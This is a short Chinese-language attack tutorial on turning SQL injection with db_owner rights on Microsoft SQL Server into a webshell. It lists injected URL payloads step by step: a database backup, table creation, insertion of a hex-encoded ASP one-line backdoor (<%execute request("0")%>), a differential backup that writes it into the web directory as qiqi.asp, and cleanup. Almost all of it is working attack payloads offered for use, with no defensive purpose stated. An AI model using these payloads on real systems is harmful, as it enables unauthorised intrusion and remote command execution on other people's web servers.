sql数据库DB_OWER权限得到WEBSHELL（前提：注入点可以列目录）

前提条件：sql数据库DB_OWER权限，可以列目录

 

 
 

先找到web目录,然后backup,找web可以先试试读注册表,nbsi里面有自己找找吧.
backup有三种方式拿shell, backup database,backup log,还有二次备份..

备份差异的方法:
http://localhost/news/newcode.asp?id=1466为注入点，为DB_OWNER权限
通过注入点要得到虚礼目录: d:\www\
1:输入http://localhost/news/newcode.asp? ...  @a sysname,@s varchar(4000) select @a=db_name(),@s=0x71697169 backup database @a to disk=@s--
为备份为名qiqi的数据库！
0x71697169 是数据库的名字转16进制了.


2:http://localhost/news/newcode.asp?id=137;Drop table [qiqi];create table 
[dbo].[qiqi] ([cmd] [image])--
建表加字段

3:http://localhost/news/newcode.asp?id=137;i ... bsp;qiqi(cmd) values
(0x3C256578656375746520726571756573742822302229253E)--
这样就是在数据库中插入一句话木马
0x3C256578656375746520726571756573742822302229253E是一句话木马
<%execute request("0")%> 的16进制代码

4:http://localhost/news/newcode.asp? ...  @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7777775C6E6577735C716971692E6173700 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
就是这样把一句话木马当作数据库的差异备份出到d:\www\news\qiqi.asp

0x643A5C7777775C6E6577735C716971692E617370是WEB物理路径径:d:\www\news\qiqi.asp的16进制代码.


5:http://localhost/news/newcode.asp?id=137;Drop table [qiqi]--
最后撤除刚刚建立的库


然后我们访问刚刚备份得出的http://localhost/news/qiqi.asp,可以看到了一大堆乱码,我们看看网页的最底,如果出现错误就表示插入木马成功了.